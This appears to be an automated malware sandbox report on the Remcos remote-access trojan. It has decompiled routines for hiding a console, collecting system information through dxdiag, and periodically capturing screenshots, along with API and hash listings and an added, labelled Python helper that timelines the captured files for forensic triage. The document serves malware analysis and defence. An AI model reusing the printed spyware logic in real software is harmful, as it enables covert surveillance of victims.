                              0x00413073
                              0x0041307c
                              0x00413084
                              0x00413089
                              0x0041308b
                              0x0041308e
                              0x00413093
                              0x00413098
                              0x0041309f
                              0x004130a8
                              0x004130ae
                              0x004130c4
                              0x004130d3
                              0x004130e1
                              0x004130e6
                              0x004130f1
                              0x004130f6
                              0x004130f7
                              0x004130f8
                              0x004130f9
                              0x004130fa
                              0x004130ff
                              0x00413101
                              0x00413109
                              0x0041310b
                              0x00413121
                              0x00413127
                              0x00413132
                              0x0041313a
                              0x00413145
                              0x0041314a
                              0x0041314a
                              0x00413152
                              0x00413152
                              0x0041315a
                              0x00413162
                              0x0041316a
                              0x00413177

                              APIs
                                • Part of subcall function 00409E6B: char_traits.LIBCPMT ref: 00409E7B
                              • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00413073
                                • Part of subcall function 00417334: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,00404210,0045F454), ref: 00417351
                              • Sleep.KERNEL32(00000064), ref: 0041309F
                              • DeleteFileW.KERNEL32(00000000), ref: 004130D3
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: File$CreateDeleteExecuteShellSleepchar_traits
                              • String ID: /t $\sysinfo.txt$b,A$dxdiag$open$temp
                              • API String ID: 2701014334-3646109375
                              • Opcode ID: c0b96fd0e9dc31874d92b89d4c1282043b81c78063e8f6c7d63bbf253ca19bec
                              • Instruction ID: ea28d571885b6fcaa569769a0be50a94edd787caab5c3991fe9ce62e94a8c89b
                              • Opcode Fuzzy Hash: c0b96fd0e9dc31874d92b89d4c1282043b81c78063e8f6c7d63bbf253ca19bec
                              • Instruction Fuzzy Hash: 3D31BF71910209AACB14FBA1DC92EEE7739AF50349F40007FB905771E2EF781E4AC699
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 59%
                              			E004188B1(void* __ebx, void* __ecx, void* __edx) {
                              				char _v204;
                              				void* __edi;
                              				struct HWND__* _t17;
                              				void _t22;
                              				intOrPtr _t24;
                              				intOrPtr _t25;
                              				void _t26;
                              				void _t28;
                              				void* _t30;
                              				void* _t34;
                              				signed int _t37;
                              				void* _t45;
                              				void* _t47;
                              				void* _t51;
                              				void* _t53;
                              				void* _t55;
                              				void* _t59;
                              
                              				_t36 = __ecx;
                              				_t34 = __ecx;
                              				AllocConsole();
                              				_t17 =  *0x46ca6c(__ebx);
                              				 *0x46bebc = _t17;
                              				if(_t34 == 0) {
                              					ShowWindow(_t17, 0);
                              				}
                              				_push(_t45);
                              				E0043A8D6(_t36, "CONOUT$", "a", E00436395(1));
                              				E00431810(_t45,  &_v204, 0, 0xc8);
                              				_t47 =  &_v204 - 1;
                              				do {
                              					_t22 =  *(_t47 + 1);
                              					_t47 = _t47 + 1;
                              				} while (_t22 != 0);
                              				_t37 = 7;
                              				memcpy(_t47, "--------------------------\n", _t37 << 2);
                              				_t51 =  &_v204 - 1;
                              				do {
                              					_t24 =  *((intOrPtr*)(_t51 + 1));
                              					_t51 = _t51 + 1;
                              				} while (_t24 != 0);
                              				asm("movsd");
                              				asm("movsd");
                              				asm("movsd");
                              				_t53 =  &_v204 - 1;
                              				do {
                              					_t25 =  *((intOrPtr*)(_t53 + 1));
                              					_t53 = _t53 + 1;
                              				} while (_t25 != 0);
                              				asm("movsd");
                              				asm("movsd");
                              				asm("movsw");
                              				_t55 =  &_v204 - 1;
                              				do {
                              					_t26 =  *(_t55 + 1);
                              					_t55 = _t55 + 1;
                              				} while (_t26 != 0);
                              				_push(6);
                              				memcpy(_t55, "\n * BreakingSecurity.net\n", 0 << 2);
                              				asm("movsw");
                              				_t59 =  &_v204 - 1;
                              				do {
                              					_t28 =  *(_t59 + 1);
                              					_t59 = _t59 + 1;
                              					_t85 = _t28;
                              				} while (_t28 != 0);
                              				_t30 = memcpy(_t59, "--------------------------\n\n", 0 << 2);
                              				asm("movsb");
                              				return E004047F8(_t85, _t30, 7);
                              			}
                              0x004188b1
                              0x004188bb
                              0x004188bd
                              0x004188c3
                              0x004188cb
                              0x004188d1
                              0x004188d6
                              0x004188d6
                              0x004188dd
                              0x004188f0
                              0x00418903
                              0x00418911
                              0x00418912
                              0x00418912
                              0x00418915
                              0x00418916
                              0x0041891c
                              0x00418922
                              0x0041892a
                              0x0041892b
                              0x0041892b
                              0x0041892e
                              0x0041892f
                              0x00418938
                              0x00418939
                              0x0041893a
                              0x00418941
                              0x00418942
                              0x00418942
                              0x00418945
                              0x00418946
                              0x0041894f
                              0x00418950
                              0x00418951
                              0x00418959
                              0x0041895a
                              0x0041895a
                              0x0041895d
                              0x0041895e
                              0x00418962
                              0x0041896a
                              0x0041896c
                              0x00418974
                              0x00418975
                              0x00418975
                              0x00418978
                              0x00418979
                              0x00418979
                              0x0041898b
                              0x0041898e
                              0x0041899a

                              APIs
                              • AllocConsole.KERNEL32(00000001), ref: 004188BD
                              • GetConsoleWindow.KERNEL32 ref: 004188C3
                              • ShowWindow.USER32(00000000,00000000), ref: 004188D6
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: ConsoleWindow$AllocShow
                              • String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.1.5 Pro$CONOUT$
                              • API String ID: 3461962499-2226434288
                              • Opcode ID: 987e66b2b04c7c3c558ee3f718a5e26cf071ce7e588e9fc2efd773313ed53ea7
                              • Instruction ID: bfc95b620952df2fd153268bde35307eb28a127fe5abf82b9ef8951bce9e7c52
                              • Opcode Fuzzy Hash: 987e66b2b04c7c3c558ee3f718a5e26cf071ce7e588e9fc2efd773313ed53ea7
                              • Instruction Fuzzy Hash: BB212B72808B0525EF10AF155C01FD6B765AF52704F004297E88C7B281EBA66DCA476D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0044087E(char _a4) {
                              				char _v8;
                              
                              				_t26 = _a4;
                              				_t52 =  *_a4;
                              				if( *_a4 != 0x4571f8) {
                              					L0043EE85(_t52);
                              					_t26 = _a4;
                              				}
                              				L0043EE85( *((intOrPtr*)(_t26 + 0x3c)));
                              				L0043EE85( *((intOrPtr*)(_a4 + 0x30)));
                              				L0043EE85( *((intOrPtr*)(_a4 + 0x34)));
                              				L0043EE85( *((intOrPtr*)(_a4 + 0x38)));
                              				L0043EE85( *((intOrPtr*)(_a4 + 0x28)));
                              				L0043EE85( *((intOrPtr*)(_a4 + 0x2c)));
                              				L0043EE85( *((intOrPtr*)(_a4 + 0x40)));
                              				L0043EE85( *((intOrPtr*)(_a4 + 0x44)));
                              				L0043EE85( *((intOrPtr*)(_a4 + 0x360)));
                              				_v8 =  &_a4;
                              				E00440744(5,  &_v8);
                              				_v8 =  &_a4;
                              				return E00440794(4,  &_v8);
                              			}





                              APIs
                              • _free.LIBCMT ref: 00440892
                                • Part of subcall function 0043EE85: HeapFree.KERNEL32(00000000,00000000,?,00447A9F,?,00000000,?,00000000,?,00447D43,?,00000007,?,?,0044828E,?), ref: 0043EE9B
                                • Part of subcall function 0043EE85: GetLastError.KERNEL32(?,?,00447A9F,?,00000000,?,00000000,?,00447D43,?,00000007,?,?,0044828E,?,?), ref: 0043EEAD
                              • _free.LIBCMT ref: 0044089E
                              • _free.LIBCMT ref: 004408A9
                              • _free.LIBCMT ref: 004408B4
                              • _free.LIBCMT ref: 004408BF
                              • _free.LIBCMT ref: 004408CA
                              • _free.LIBCMT ref: 004408D5
                              • _free.LIBCMT ref: 004408E0
                              • _free.LIBCMT ref: 004408EB
                              • _free.LIBCMT ref: 004408F9
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: _free$ErrorFreeHeapLast
                              • String ID:
                              • API String ID: 776569668-0
                              • Opcode ID: c63880faff989d5ccff85de8c36c4632de699c5cb9251132617d836dac5e14a5
                              • Instruction ID: c522220ac2d5c32fe01852b59e6646c10f04ef358e737e5df1941df93b3e5ff3
                              • Opcode Fuzzy Hash: c63880faff989d5ccff85de8c36c4632de699c5cb9251132617d836dac5e14a5
                              • Instruction Fuzzy Hash: 6B11A476101108AFCF11EF56C942CD93BA6EF08754F0150AAFA188F262DE35EA55DB84
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 71%
                              			E0043D65F(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
                              				signed int _v8;
                              				short _v270;
                              				short _v272;
                              				char _v528;
                              				char _v700;
                              				signed int _v704;
                              				signed int _v708;
                              				short _v710;
                              				signed int* _v712;
                              				signed int _v716;
                              				signed int _v720;
                              				signed int _v724;
                              				signed int* _v728;
                              				signed int _v732;
                              				signed int _v736;
                              				signed int _v740;
                              				signed int _v744;
                              				signed int _t149;
                              				void* _t156;
                              				signed int _t157;
                              				signed int _t158;
                              				intOrPtr _t159;
                              				signed int _t162;
                              				signed int _t166;
                              				signed int _t167;
                              				signed int _t172;
                              				signed int _t173;
                              				signed int _t175;
                              				signed int _t195;
                              				signed int _t196;
                              				signed int _t199;
                              				signed int _t204;
                              				signed int _t207;
                              				intOrPtr* _t213;
                              				intOrPtr* _t214;
                              				signed int _t225;
                              				signed int _t228;
                              				intOrPtr* _t229;
                              				signed int _t231;
                              				signed int* _t235;
                              				void* _t243;
                              				signed int _t244;
                              				intOrPtr _t246;
                              				signed int _t251;
                              				signed int _t253;
                              				signed int _t257;
                              				signed int* _t258;
                              				intOrPtr* _t259;
                              				short _t260;
                              				signed int _t262;
                              				signed int _t264;
                              				void* _t266;
                              				void* _t268;
                              
                              				_t262 = _t264;
                              				_t149 =  *0x46a00c; // 0x5d382218
                              				_v8 = _t149 ^ _t262;
                              				_push(__ebx);
                              				_t207 = _a8;
                              				_push(__esi);
                              				_push(__edi);
                              				_t246 = _a4;
                              				_v744 = _t207;
                              				_v728 = E00440972(_t207, __ecx, __edx) + 0x278;
                              				_push( &_v708);
                              				_t156 = L0043CDA9(_t207, __edx, _t246, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55);
                              				_t266 = _t264 - 0x2e4 + 0x18;
                              				if(_t156 != 0) {
                              					_t11 = _t207 + 2; // 0x6
                              					_t251 = _t11 << 4;
                              					__eflags = _t251;
                              					_t157 =  &_v272;
                              					_v716 = _t251;
                              					_t213 =  *((intOrPtr*)(_t251 + _t246));
                              					while(1) {
                              						_v704 = _v704 & 0x00000000;
                              						__eflags =  *_t157 -  *_t213;
                              						_t253 = _v716;
                              						if( *_t157 !=  *_t213) {
                              							break;
                              						}
                              						__eflags =  *_t157;
                              						if( *_t157 == 0) {
                              							L8:
                              							_t158 = _v704;
                              						} else {
                              							_t260 =  *((intOrPtr*)(_t157 + 2));
                              							__eflags = _t260 -  *((intOrPtr*)(_t213 + 2));
                              							_v710 = _t260;
                              							_t253 = _v716;
                              							if(_t260 !=  *((intOrPtr*)(_t213 + 2))) {
                              								break;
                              							} else {
                              								_t157 = _t157 + 4;
                              								_t213 = _t213 + 4;
                              								__eflags = _v710;
                              								if(_v710 != 0) {
                              									continue;
                              								} else {
                              									goto L8;
                              								}
                              							}
                              						}
                              						L10:
                              						__eflags = _t158;
                              						if(_t158 != 0) {
                              							_t214 =  &_v272;
                              							_t243 = _t214 + 2;
                              							do {
                              								_t159 =  *_t214;
                              								_t214 = _t214 + 2;
                              								__eflags = _t159 - _v704;
                              							} while (_t159 != _v704);
                              							_v720 = (_t214 - _t243 >> 1) + 1;
                              							_t162 = E0043E61D(_t214 - _t243 >> 1, 4 + ((_t214 - _t243 >> 1) + 1) * 2);
                              							_v732 = _t162;
                              							__eflags = _t162;
                              							if(_t162 == 0) {
                              								goto L1;
                              							} else {
                              								_v724 =  *((intOrPtr*)(_t253 + _t246));
                              								_t35 = _t207 * 4; // 0xb86e
                              								_v736 =  *((intOrPtr*)(_t246 + _t35 + 0xa0));
                              								_t38 = _t246 + 8; // 0x8b56ff8b
                              								_v740 =  *_t38;
                              								_t223 =  &_v272;
                              								_v712 = _t162 + 4;
                              								_t166 = E00440264(_t162 + 4, _v720,  &_v272);
                              								_t268 = _t266 + 0xc;
                              								__eflags = _t166;
                              								if(_t166 != 0) {
                              									_t167 = _v704;
                              									_push(_t167);
                              									_push(_t167);
                              									_push(_t167);
                              									_push(_t167);
                              									_push(_t167);
                              									E0043629A();
                              									asm("int3");
                              									return  *0x46b508;
                              								} else {
                              									__eflags = _v272 - 0x43;
                              									 *((intOrPtr*)(_t253 + _t246)) = _v712;
                              									if(_v272 != 0x43) {
                              										L19:
                              										_t172 = L0043CAB6(_t207, _t223, _t246,  &_v700);
                              										_t225 = _v704;
                              										 *(_t246 + 0xa0 + _t207 * 4) = _t172;
                              									} else {
                              										__eflags = _v270;
                              										if(_v270 != 0) {
                              											goto L19;
                              										} else {
                              											_t225 = _v704;
                              											 *(_t246 + 0xa0 + _t207 * 4) = _t225;
                              										}
                              									}
                              									__eflags = _t207 - 2;
                              									if(_t207 != 2) {
                              										__eflags = _t207 - 1;
                              										if(_t207 != 1) {
                              											__eflags = _t207 - 5;
                              											if(_t207 == 5) {
                              												 *((intOrPtr*)(_t246 + 0x14)) = _v708;
                              											}
                              										} else {
                              											 *((intOrPtr*)(_t246 + 0x10)) = _v708;
                              										}
                              									} else {
                              										_t258 = _v728;
                              										_t244 = _t225;
                              										_t235 = _t258;
                              										 *(_t246 + 8) = _v708;
                              										_v712 = _t258;
                              										_v720 = _t258[8];
                              										_v708 = _t258[9];
                              										while(1) {
                              											_t64 = _t246 + 8; // 0x8b56ff8b
                              											__eflags =  *_t64 -  *_t235;
                              											if( *_t64 ==  *_t235) {
                              												break;
                              											}
                              											_t259 = _v712;
                              											_t244 = _t244 + 1;
                              											_t204 =  *_t235;
                              											 *_t259 = _v720;
                              											_v708 = _t235[1];
                              											_t235 = _t259 + 8;
                              											 *((intOrPtr*)(_t259 + 4)) = _v708;
                              											_t207 = _v744;
                              											_t258 = _v728;
                              											_v720 = _t204;
                              											_v712 = _t235;
                              											__eflags = _t244 - 5;
                              											if(_t244 < 5) {
                              												continue;
                              											} else {
                              											}
                              											L27:
                              											__eflags = _t244 - 5;
                              											if(__eflags == 0) {
                              												_t88 = _t246 + 8; // 0x8b56ff8b
                              												_t195 = L00447F5C(_t207, _t244, _t246, _t258, __eflags, _v704, 1, 0x457400, 0x7f,  &_v528,  *_t88, 1);
                              												_t268 = _t268 + 0x1c;
                              												__eflags = _t195;
                              												_t196 = _v704;
                              												if(_t195 == 0) {
                              													_t258[1] = _t196;
                              												} else {
                              													do {
                              														 *(_t262 + _t196 * 2 - 0x20c) =  *(_t262 + _t196 * 2 - 0x20c) & 0x000001ff;
                              														_t196 = _t196 + 1;
                              														__eflags = _t196 - 0x7f;
                              													} while (_t196 < 0x7f);
                              													_t199 = E004330D1( &_v528,  *0x46a170, 0xfe);
                              													_t268 = _t268 + 0xc;
                              													__eflags = _t199;
                              													_t258[1] = 0 | _t199 == 0x00000000;
                              												}
                              												_t103 = _t246 + 8; // 0x8b56ff8b
                              												 *_t258 =  *_t103;
                              											}
                              											 *(_t246 + 0x18) = _t258[1];
                              											goto L38;
                              										}
                              										__eflags = _t244;
                              										if(_t244 != 0) {
                              											 *_t258 =  *(_t258 + _t244 * 8);
                              											_t258[1] =  *(_t258 + 4 + _t244 * 8);
                              											 *(_t258 + _t244 * 8) = _v720;
                              											 *(_t258 + 4 + _t244 * 8) = _v708;
                              										}
                              										goto L27;
                              									}
                              									L38:
                              									_t173 = _t207 * 0xc;
                              									_t110 = _t173 + 0x457340; // 0x40e12c
                              									 *0x45346c(_t246);
                              									_t175 =  *((intOrPtr*)( *_t110))();
                              									_t228 = _v724;
                              									__eflags = _t175;
                              									if(_t175 == 0) {
                              										__eflags = _t228 - 0x46a2a8;
                              										if(_t228 != 0x46a2a8) {
                              											_t257 = _t207 + _t207;
                              											__eflags = _t257;
                              											asm("lock xadd [eax], ecx");
                              											if(_t257 != 0) {
                              												goto L43;
                              											} else {
                              												_t128 = _t257 * 8; // 0x30ff068b
                              												L0043EE85( *((intOrPtr*)(_t246 + _t128 + 0x28)));
                              												_t131 = _t257 * 8; // 0x30ff0c46
                              												L0043EE85( *((intOrPtr*)(_t246 + _t131 + 0x24)));
                              												_t134 = _t207 * 4; // 0xb86e
                              												L0043EE85( *((intOrPtr*)(_t246 + _t134 + 0xa0)));
                              												_t231 = _v704;
                              												 *((intOrPtr*)(_v716 + _t246)) = _t231;
                              												 *(_t246 + 0xa0 + _t207 * 4) = _t231;
                              											}
                              										}
                              										_t229 = _v732;
                              										 *_t229 = 1;
                              										 *((intOrPtr*)(_t246 + 0x28 + (_t207 + _t207) * 8)) = _t229;
                              									} else {
                              										 *(_v716 + _t246) = _t228;
                              										_t115 = _t207 * 4; // 0xb86e
                              										L0043EE85( *((intOrPtr*)(_t246 + _t115 + 0xa0)));
                              										 *(_t246 + 0xa0 + _t207 * 4) = _v736;
                              										L0043EE85(_v732);
                              										 *(_t246 + 8) = _v740;
                              										goto L1;
                              									}
                              									goto L2;
                              								}
                              							}
                              						} else {
                              							goto L2;
                              						}
                              						goto L47;
                              					}
                              					asm("sbb eax, eax");
                              					_t158 = _t157 | 0x00000001;
                              					__eflags = _t158;
                              					goto L10;
                              				} else {
                              					L1:
                              					L2:
                              					return E0042F61B(_v8 ^ _t262);
                              				}
                              				L47:
                              			}

                              APIs
                                • Part of subcall function 00440972: GetLastError.KERNEL32(00000000,?,00434E55,?,?,?,00439275,?,00428772,00000000,?,00000000,?,?,00428772), ref: 00440976
                                • Part of subcall function 00440972: _free.LIBCMT ref: 004409A9
                                • Part of subcall function 00440972: SetLastError.KERNEL32(00000000,00439275,?,00428772,00000000,?,00000000,?,?,00428772), ref: 004409EA
                                • Part of subcall function 00440972: _abort.LIBCMT ref: 004409F0
                              • _memcmp.LIBVCRUNTIME ref: 0043D909
                              • _free.LIBCMT ref: 0043D97A
                              • _free.LIBCMT ref: 0043D993
                              • _free.LIBCMT ref: 0043D9C5
                              • _free.LIBCMT ref: 0043D9CE
                              • _free.LIBCMT ref: 0043D9DA
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: _free$ErrorLast$_abort_memcmp
                              • String ID: C$@
                              • API String ID: 1679612858-1810246019
                              • Opcode ID: d206b5de6287ad100f648a7d92be551892ec8ba6376f2bd188670c6f30b94e7c
                              • Instruction ID: 52565f1e93295bb36fd0e3f4fb9911c45a8627ad54808d25164a72537c1ebd07
                              • Opcode Fuzzy Hash: d206b5de6287ad100f648a7d92be551892ec8ba6376f2bd188670c6f30b94e7c
                              • Instruction Fuzzy Hash: F1B13775E012199BDB24DF19D885BAEB7B4FF48304F2045AAE849A7351E734AE90CF84
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 85%
                              			E004152D7() {
                              				intOrPtr* _t42;
                              				void* _t45;
                              				char* _t54;
                              				void* _t72;
                              				long _t78;
                              				void* _t83;
                              				struct _SECURITY_ATTRIBUTES* _t85;
                              				struct _SECURITY_ATTRIBUTES* _t92;
                              				void* _t131;
                              				void* _t132;
                              				void* _t140;
                              				void* _t141;
                              				void* _t146;
                              				intOrPtr _t147;
                              				void* _t148;
                              				void* _t149;
                              				void* _t150;
                              
                              				E00450918(0x451ece, _t146);
                              				_push(_t141);
                              				 *((intOrPtr*)(_t146 - 0x10)) = _t147;
                              				_t92 = 0;
                              				 *((intOrPtr*)(_t146 - 4)) = 0;
                              				_t149 =  *0x46bea0 - _t92; // 0x0
                              				if(_t149 == 0) {
                              					_t147 = _t147 - 0xc;
                              					_t131 = _t146 - 0x68;
                              					L00413D5E(_t131);
                              					__imp__GdiplusStartup(0x46bea0, _t131, 0); // GDI+ initialised once, before the capture loop below
                              				}
                              				_t150 =  *0x46bd70 - _t92; // 0x0
                              				if(_t150 == 0) {
                              					L00401EDA(0x46c880, _t132, _t141, E0041481D(_t146 - 0x40));
                              					L00401ED0();
                              				}
                              				_t42 = L00401F75(L00401E29(0x46c578, _t132, _t150, 0x19));
                              				_t45 = L00401ECB(L00416C32(_t146 - 0x58, L00401E29(0x46c578, _t132, _t150, 0x1a)));
                              				_t134 =  *_t42;
                              				L00401EDA(0x46c868,  *_t42, 0x46c868, E004179B3(_t146 - 0x40,  *_t42, _t45));
                              				L00401ED0();
                              				L00401ED0();
                              				CreateDirectoryW(L00401ECB(0x46c868), _t92); // output directory, assembled above from entries 0x19 and 0x1a of the table at 0x46c578
                              				L00401F4D(_t92, _t146 - 0xb0);
                              				L00401F4D(_t92, _t146 - 0x80);
                              				 *(_t146 - 0x11) = _t92;
                              				 *0x46bd6b = 1;
                              				_t54 =  *((intOrPtr*)(_t146 + 8));
                              				// file-name stems; the six integers are filled from GetLocalTime (victim's local clock), see L11
                              				_t145 =  !=  ? L"time_%04i%02i%02i_%02i%02i%02i" : L"wnd_%04i%02i%02i_%02i%02i%02i";
                              				 *(_t146 - 0x18) =  !=  ? L"time_%04i%02i%02i_%02i%02i%02i" : L"wnd_%04i%02i%02i_%02i%02i%02i";
                              				_t140 = Sleep;
                              				L6:
                              				while(1) {
                              					if( *_t54 != 1) { // mode byte != 1: timed capture; == 1: wait for the window trigger polled below
                              						L11:
                              						GetLocalTime(_t146 - 0x28);
                              						_push( *(_t146 - 0x1c) & 0x0000ffff);
                              						_push( *(_t146 - 0x1e) & 0x0000ffff);
                              						_push( *(_t146 - 0x20) & 0x0000ffff);
                              						_push( *(_t146 - 0x22) & 0x0000ffff);
                              						_push( *(_t146 - 0x26) & 0x0000ffff);
                              						L00413D37(_t146 - 0x2b8, _t145,  *(_t146 - 0x28) & 0x0000ffff);
                              						_t147 = _t147 + 0x20;
                              						L00401EDA(_t146 - 0x80, _t66, _t145, E00403086(_t92, _t146 - 0x58, E00403086(_t92, _t146 - 0x40, E00407516(_t146 - 0x98, 0x46c868, __eflags, "\\"), _t140, __eflags, _t146 - 0x2b8), _t140, __eflags, "."));
                              						L00401ED0();
                              						L00401ED0();
                              						L00401ED0();
                              						_t72 = L00401ECB(_t146 - 0x80);
                              						_t134 =  *((intOrPtr*)( *((intOrPtr*)(_t146 + 8)) + 1));
                              						E0041510D(_t72,  *((intOrPtr*)( *((intOrPtr*)(_t146 + 8)) + 1)), __eflags);
                              						__eflags =  *((char*)( *((intOrPtr*)(_t146 + 8))));
                              						if(__eflags != 0) {
                              							_t92 = 0;
                              							 *(_t146 - 0x11) = 0;
                              							_t78 = E00436079(_t75, L00401F75(L00401E29(0x46c578, _t134, __eflags, 0x18))) * 0x3e8; // configured seconds -> ms
                              							__eflags = _t78;
                              						} else {
                              							_t78 = E00436079(_t79, L00401F75(L00401E29(0x46c578, _t134, __eflags, 0x15))) * 0xea60; // configured minutes -> ms
                              						}
                              						Sleep(_t78);
                              						_t54 =  *((intOrPtr*)(_t146 + 8));
                              						continue;
                              					}
                              					_t145 = L"wnd_%04i%02i%02i_%02i%02i%02i";
                              					 *(_t146 - 0x18) = L"wnd_%04i%02i%02i_%02i%02i%02i";
                              					while(1) {
                              						_t153 = _t92;
                              						if(_t92 != 0) {
                              							goto L11;
                              						}
                              						_t83 = L00401F75(L00401E29(0x46c578, _t134, _t153, 0x17));
                              						_t148 = _t147 - 0x18;
                              						E0040425F(_t92, _t148, _t83);
                              						_t85 = E00417417(0, _t134);
                              						_t147 = _t148 + 0x18;
                              						_t92 = _t85;
                              						 *(_t146 - 0x11) = _t92;
                              						if(_t92 != 0) {
                              							goto L11;
                              						}
                              						Sleep(0x3e8); // poll the window trigger once per second
                              					}
                              					goto L11;
                              				}
                              			}

                              APIs
                              • __EH_prolog.LIBCMT ref: 004152DC
                              • GdiplusStartup.GDIPLUS(0046BEA0,?,00000000), ref: 0041530E
                                • Part of subcall function 00407516: char_traits.LIBCPMT ref: 00407531
                                • Part of subcall function 0041510D: DeleteFileW.KERNEL32(00000000,0000001B), ref: 004151F7
                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041539A
                              • Sleep.KERNEL32(000003E8), ref: 00415420
                              • GetLocalTime.KERNEL32(?), ref: 00415428
                              • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00415517
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: Sleep$CreateDeleteDirectoryFileGdiplusH_prologLocalStartupTimechar_traits
                              • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                              • API String ID: 649275306-3790400642
                              • Opcode ID: b7cd92589d8d1aabb47beff9a7ba087f3d58a61c122a24d20020f3e57d9b48ef
                              • Instruction ID: 36c87be1b18ce6efe71a969fa5af4a68c9604fdc2ab21ef0b6733f40622ad6ee
                              • Opcode Fuzzy Hash: b7cd92589d8d1aabb47beff9a7ba087f3d58a61c122a24d20020f3e57d9b48ef
                              • Instruction Fuzzy Hash: 2F518070A001589ACB14BBB6DC52AFE7769AB55309F40003FF845A72E2EF3C5E85C799
                              Uniqueness

                              Uniqueness Score: -1.00%
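
The loop in E004152D7 names each capture after the victim's local clock (GetLocalTime) with the stem time_YYYYMMDD_HHMMSS for timer-driven captures or wnd_YYYYMMDD_HHMMSS for window-triggered ones, appends an extension taken from the configuration table, and sleeps a configured number of seconds (x 0x3e8) or minutes (x 0xea60) between timer captures. The following triage helper is an added example and is not code from the report or from the Remcos binary: it recognises such file names in a directory listing, orders them into a timeline, and estimates the configured timer interval from the gaps. The extension is unknown here, so any extension is accepted, and the directory listing inside the block is constructed for the demonstration.

```python
"""Added example (not part of the Joe Sandbox report or of Remcos): recognise
and order the screenshot files produced by the capture loop in E004152D7.

Assumptions, labelled: the file extension comes from configuration and is not
known here, so any extension is accepted; SAMPLE_LISTING is constructed test
data, not output from the analysed sample."""
import re
import statistics
from dataclasses import dataclass
from datetime import datetime
from typing import Iterable, List, Optional

# Format strings seen in the sample (wide strings in the binary):
#   L"time_%04i%02i%02i_%02i%02i%02i"  timer-driven capture
#   L"wnd_%04i%02i%02i_%02i%02i%02i"   window-title-driven capture
# The six integers come from GetLocalTime(), i.e. the victim's local clock.
_NAME_RE = re.compile(
    r"^(?P<trigger>time|wnd)_"
    r"(?P<year>\d{4})(?P<month>\d{2})(?P<day>\d{2})_"
    r"(?P<hour>\d{2})(?P<minute>\d{2})(?P<second>\d{2})"
    r"\.(?P<ext>[^./\\]+)$"
)


@dataclass(frozen=True)
class Capture:
    name: str
    trigger: str          # "time" or "wnd"
    local_time: datetime  # naive: victim local time, not UTC
    ext: str


def parse_capture_name(name: str) -> Optional[Capture]:
    """Return a Capture for a Remcos-style screenshot file name, else None."""
    m = _NAME_RE.match(name)
    if not m:
        return None
    try:
        when = datetime(int(m["year"]), int(m["month"]), int(m["day"]),
                        int(m["hour"]), int(m["minute"]), int(m["second"]))
    except ValueError:  # e.g. month 13: matches the regex but is not a real time
        return None
    return Capture(name, m["trigger"], when, m["ext"])


def build_timeline(names: Iterable[str]) -> List[Capture]:
    """Keep only capture names, ordered by the embedded local timestamp."""
    caps = [c for c in (parse_capture_name(n) for n in names) if c is not None]
    return sorted(caps, key=lambda c: (c.local_time, c.name))


def estimate_timer_interval_s(timeline: List[Capture]) -> Optional[float]:
    """Median gap between consecutive time_ captures, in seconds.

    The sample sleeps a configured count of seconds (*0x3e8) or minutes
    (*0xea60) between timer captures, so the median gap approximates that
    setting even when a few captures are missing or were deleted."""
    timed = [c.local_time for c in timeline if c.trigger == "time"]
    if len(timed) < 2:
        return None
    gaps = [(b - a).total_seconds() for a, b in zip(timed, timed[1:])]
    return statistics.median(gaps)


# Constructed directory listing for the demonstration (not from the sandbox run).
SAMPLE_LISTING = [
    "time_20210927_101500.jpg",
    "time_20210927_101600.jpg",
    "wnd_20210927_101542.jpg",
    "time_20210927_101700.jpg",
    "desktop.ini",
    "time_20210927_1017.jpg",    # too short: not a capture name
    "time_20211327_101800.jpg",  # month 13: rejected by datetime()
]

if __name__ == "__main__":
    tl = build_timeline(SAMPLE_LISTING)
    for c in tl:
        print(f"{c.local_time:%Y-%m-%d %H:%M:%S}  {c.trigger:4}  {c.name}")
    print("estimated timer interval (s):", estimate_timer_interval_s(tl))
```

When correlating with other evidence, remember that the embedded timestamp is the victim's local time; convert it with the host's time zone before lining it up against UTC network logs.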

                              C-Code - Quality: 73%
                              			// CRT low-level I/O, not Remcos logic: the text-mode console write path of _write (GetConsoleCP /
                              			// WideCharToMultiByte / WriteFile), which also expands "\n" to "\r\n" (the 0xd written after a 0xa byte).
                              			E004437EC(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                              				signed int _v8;
                              				signed char _v15;
                              				char _v16;
                              				void _v24;
                              				short _v28;
                              				char _v31;
                              				void _v32;
                              				char _v36;
